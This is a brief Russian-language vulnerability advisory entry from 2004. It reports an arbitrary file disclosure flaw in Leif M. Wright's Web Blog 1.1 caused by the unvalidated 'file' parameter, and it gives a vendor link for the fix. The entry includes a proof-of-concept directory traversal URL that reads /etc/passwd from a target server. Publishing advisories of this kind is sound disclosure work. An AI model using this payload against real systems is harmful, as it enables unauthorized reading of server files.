Security Lab

Просмотр произвольных файлов в Leif M. Wright's Web Blog

Дата публикации:30.01.2004
Всего просмотров:1426
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Уязвимые версии: Leif M. Wright Web Blog 1.1

Описание: Уязвимость обнаружена в Leif M. Wright's Web Blog. Удаленный пользователь может просматривать файлы на целевой системе.

Программное обеспечение не в состоянии правильно проверить данные, представленные пользователем в переменной 'file'.

 
http://[target]/directory/blog.cgi?submit=ViewFile&month=[month]&year=[year]&file=/../../../../../../../../../../../../../../../ ../etc/passwd

URL производителя:http://leifwright.com/scripts/Blog.html

Решение:http://leifwright.com/scripts/zips/blog.zip

Ссылки: ZH2004-01SA (security advisory): Web Blog 1.1 Remote arbitrary files